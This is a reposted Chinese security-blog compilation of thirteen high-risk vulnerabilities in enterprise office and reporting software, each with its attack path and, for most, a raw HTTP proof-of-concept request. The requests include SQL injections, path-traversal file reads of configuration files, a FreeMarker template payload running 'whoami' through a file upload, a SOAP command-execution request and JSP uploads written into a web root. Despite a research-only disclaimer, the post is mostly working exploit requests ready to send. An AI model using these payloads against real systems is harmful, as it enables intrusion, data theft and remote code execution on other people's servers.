hvv漏洞合集

admin 2024年8月5日13:02:10评论71 views字数 7221阅读24分4秒阅读模式

想第一时间看到我们的大图推送吗?赶紧把我们设为星标吧!这样您就不会错过任何精彩内容啦!感谢您的支持!🌟

免责声明

      文章所涉及内容,仅供安全研究教学使用,由于传播、利用本文所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

2024.7.22-2024.8.2高危漏洞合集

1.万户ezOFFICE协同管理平台 getAutoCode SQL注入漏洞

攻击路径:/defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp
poc:
GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C5%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1
Host: 
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
2.用友NC UserAuthenticationServlet 反序列化漏洞
攻击路径:/servlet/~uapim/nc.bs.pub.im.UserAuthenticationServlet
poc:文章后附有
3.浪潮GS企业管理软件 xtdysrv.asmx 远程代码执行漏洞
攻击路径:/cwbase/service/rps/xtdysrv.asmx
poc:
POST /cwbase/service/rps/xtdysrv.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: 16398
SOAPAction: "http://tempuri.org/SavePrintFormatAssign"
cmd: whoami
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SavePrintFormatAssign xmlns="http://tempuri.org/">
      <psBizObj>string</psBizObj>
      <psLxId>string</psLxId>
<psLxMc>string</psLxMc>
      <printOpByte>恶意序列化数据</printOpByte>
      <printInfoByte></printInfoByte>
    </SavePrintFormatAssign>
  </soap:Body>
</soap:Envelope>
4.泛微e-cology9 /services/WorkPlanService 前台SQL注入漏洞
攻击路径:/services/WorkPlanService
poc:文章后附有
5.金和OA C6 GeneralXmlhttpPage.aspx SQL注入漏洞
攻击路径: /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/
poc:
GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/?id=%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1  
Host:   
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: ASP.NET_SessionId=lm3qrfg3b3khewr0yiy2r3oa  
Connection: close 
6.赛蓝企业管理系统 GetJSFile 任意文件读取漏洞
攻击路径:/Utility/GetJSFile
poc:
GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
7.通达OA V11.10 login.php SQL注入漏洞
攻击路径:/ispirit/interface/login.php
poc:
POST /ispirit/interface/login.php HTTP/1.1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.855.2 Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
Host:   
Content-Length: 107  
  
name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1%3d1,1,(select+~0%2b1))+limit+0,1))--+'  
8.浪潮云财务系统 bizintegrationwebservice 命令执行漏洞
攻击路径:/cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx
poc:文章后附有
9.帆软FineReport ReportSever Sqlite注入导致远程代码执行漏洞
攻击路径:/webroot/decision/view/ReportServer
poc:
GET /webroot/decision/view/ReportServer?test=ssssss&n=${a=sql('FRDemo',DECODE('%ef%bb%bfattach%20database%20%27%2E%2E%2Fwebapps%2Fwebroot%2Ftest%2Ejsp%27%20as%20%27test%27%3B'),1,1)} HTTP/1.1  
Host:   
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Upgrade-Insecure-Requests: 1  
10.润乾报表 dataSphereServlet 任意文件读取漏洞
攻击路径:/demo/servlet/dataSphereServlet?action=11
poc:
POST /demo/servlet/dataSphereServlet?action=11 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
path=../../../../../../../../../../../windows/win.ini&content=&mode=
11.满客宝智慧食堂系统 downloadWebFile 任意文件读取漏洞
攻击路径:/base/api/v1/kitchenVideo/downloadWebFile
poc:
GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=a&ossKey=/jars/mkb-job-admin/application-prod-job-private.yml HTTP/1.1
Host: 
12.铭飞MCMS 远程代码执行漏洞
攻击路径:/static/plugins/ueditor/{version}/jsp/editor.do
poc:
POST /static/plugins/ueditor/1.4.3.3/jsp/editor.do?jsonConfig=%7b%76%69%64%65%6f%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%66%69%6c%65%4d%61%6e%61%67%65%72%4c%69%73%74%50%61%74%68%3a%27%27%2c%69%6d%61%67%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%76%69%64%65%6f%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%7b%5c%75%30%30%32%45%5c%75%30%30%32%45%5c%75%30%30%32%46%7d%7b%74%65%6d%70%6c%61%74%65%2f%31%2f%64%65%66%61%75%6c%74%2f%7d%7b%74%69%6d%65%7d%27%2c%66%69%6c%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%76%69%64%65%6f%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%22%69%6d%61%67%65%41%6c%6c%6f%77%46%69%6c%65%73%22%3a%5b%22%2e%70%6e%67%22%2c%20%22%2e%6a%70%67%22%2c%20%22%2e%6a%70%65%67%22%2c%20%22%2e%6a%73%70%78%22%2c%20%22%2e%6a%73%70%22%2c%22%2e%68%74%6d%22%5d%7d%0a&action=uploadimage HTTP/1.1  
User-Agent: xxx  
Accept: */*  
Postman-Token: bb71767c-7223-4ba3-8151-c81b8a5dc1ec  
Host: 127.0.0.1:8080  
Accept-Encoding: gzip, deflate  
Connection: close  
Content-Type: multipart/form-data; boundary=--------------------------583450229485407027180070  
Content-Length: 279  
  
----------------------------583450229485407027180070  
Content-Disposition: form-data; name="upload"; filename="1.htm"  
Content-Type: image/png  
  
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("whoami") }  
----------------------------583450229485407027180070--  
13.H3C-CAS管理平台文件上传漏洞
访问/cas/fileUpload/upload接口
poc(有两种上传方式):
POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/update.jsp&name=222 HTTP/1.1  
Host: 172.16.33.199:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: application/json, text/plain, */*  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate  
Connection: close  
Referer: http://172.16.33.199:8080/cas/login Cookie:  
Content-Length: 2212  
Content-range: bytes 0-10/20  
  
jsp数据  
 
或者
POST /cas/fileUpload/fd HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=a4d7586ac9d50625dee11e86fa69bc71
Content-Length: 217
--a4d7586ac9d50625dee11e86fa69bc71
Content-Disposition: form-data; name="token"
/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/stc11.jsp
--a4d7586ac9d50625dee11e86fa69bc71
Content-Disposition: form-data; name="file"; filename="123.jsp"
Content-Type: image/png
<% out.println("215882935");%>  
--a4d7586ac9d50625dee11e86fa69bc71--

 

关注公众号并回复hvv漏洞获取最新相关漏洞全部poc

原文始发于微信公众号(泾弦安全):hvv漏洞合集

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月5日13:02:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   hvv漏洞合集http://cn-sec.com/archives/3036783.html

发表评论

匿名网友 填写信息